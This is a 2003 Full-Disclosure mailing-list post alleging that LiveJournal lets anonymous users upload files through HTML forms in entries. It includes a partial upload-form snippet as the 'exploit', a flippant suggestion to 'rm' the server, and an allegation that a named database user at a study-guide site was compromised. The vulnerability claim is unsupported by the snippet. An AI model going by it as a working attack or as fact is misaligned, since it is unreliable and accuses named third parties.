[Full-Disclosure] LiveJournal remote file upload

From: meme-boi (meme-boiat_private)
Date: Fri Jun 06 2003 - 16:51:38 PDT

    Synopsis: Livejournal.com and livejournal systems are vulnerable
              to remote file upload by anonymous users

    Versions: all

    Impact: Who cares ( maybe udp)

    LiveJournal.com is a free service that allows you to create and customize
    your very own "live journal" - a journal that you keep online!

    Vulnerability: Live journal allows both anonymous and registered users
                   to use "form enctype" and "post method" in their entries
                   giving easy access to system compromise.

    Exploit:

    -----------partial( if you can't figure it out you are sad--------------

    <head> meme-tronic</head>
    <form enctype="multipart/form-data" method="post">
    <TABLE WIDTH="100%">
    <TR>
       <TD ALIGN="RIGHT" VALIGN="TOP">Filename:</TD>

       <TD ALIGN="LEFT"><INPUT TYPE="FILE" NAME="FILE1">
       </TD>
    </TR>
    <TR>
       <TD ALIGN="RIGHT">&nbsp;</TD>
       <TD ALIGN="LEFT"><INPUT TYPE="SUBMIT" NAME="SUB1" VALUE="Upload
       File"></TD></TR>
    <TR>

    Fix: I don't get payed to fix. I would suggest an rm on debian server
         as well as ns1.bradfitz.com and back up prior to 10/02 though

    Sidenote: www.cccure.org - The CISSP and SSCP Open Study Guides Web site
              should also rm as MySql database user "cdupuis@localhost" was
              owned some time ago

    Vendor Notification: None - This is full disclosure

    Summer of the Sickness is drawing near.......

    Copyright © 2003, Paper Street Soap Company, Inc.

    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html